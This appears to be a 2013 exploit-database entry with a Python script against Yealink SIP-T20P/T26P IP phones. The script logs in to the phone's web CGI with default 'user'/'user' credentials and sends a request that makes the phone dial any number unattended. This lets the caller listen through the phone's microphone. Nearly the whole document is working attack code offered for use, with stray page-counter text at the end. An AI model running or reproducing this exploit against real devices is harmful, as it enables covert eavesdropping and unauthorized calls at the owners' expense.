# Exploit Title: [YeaLink IP Phone SIP-TxxP firmware <= phone call vulnerability] # Date: [05-28-2013] # Exploit Author: [b0hr (francisco<[at]>garnelo.eu)] # Vendor Homepage: [http://yealink.com] # Software Link: [ http://yealink.com/product_list.aspx?BaseInfoCateId=147&CateId=147&ProductsCateID=147 ] # Version: and lower] # Tested on: [YeaLink IP Phone SIP-T20P and SIP-T26P (hardware VoIP phone)] # Vulnerability : [It's possible to make calls from using the first available sip account, without supervision or confirmation of the user, also the call receiver can listen through the phone mic .] #!/usr/bin/python import urllib2, sys print "\n YeaLink IP Phone SIP-TxxP firmware <= phone call vulnerability - b0rh (francisco<[at]>garnelo.eu) - 2013-05-28 \n" if (len(sys.argv) != 3): print ">> Use: " + sys.argv[0] + " <IP Phone> <phone number>" print ">> Ex: " + sys.argv[0] + " 123456789\n" exit(0) IP = sys.argv[1] num = sys.argv[2] UrlGet_params = 'http://%s/cgi-bin/ConfigManApp.com?Id=34&Command=1&Number=%s&Account=0&sid=0.724202975169738' % (IP, num) webU = 'user' webP = 'user' query = urllib2.HTTPPasswordMgrWithDefaultRealm() query.add_password(None, UrlGet_params, webU, webP) auth = urllib2.HTTPBasicAuthHandler(query) log = urllib2.build_opener(auth) urllib2.install_opener(log) queryPag = urllib2.urlopen(UrlGet_params) print "\n Call to %s form IP phone %s\n" %(num,IP)Брой прочитания на тази страница: 1319
YeaLink IP Phone Firmware <= Unauthenticated Phone Call Vulnerability